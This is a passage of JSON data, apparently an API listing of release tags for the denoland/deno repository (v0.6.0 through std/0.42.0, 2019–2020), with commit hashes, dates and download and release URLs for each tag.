04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"na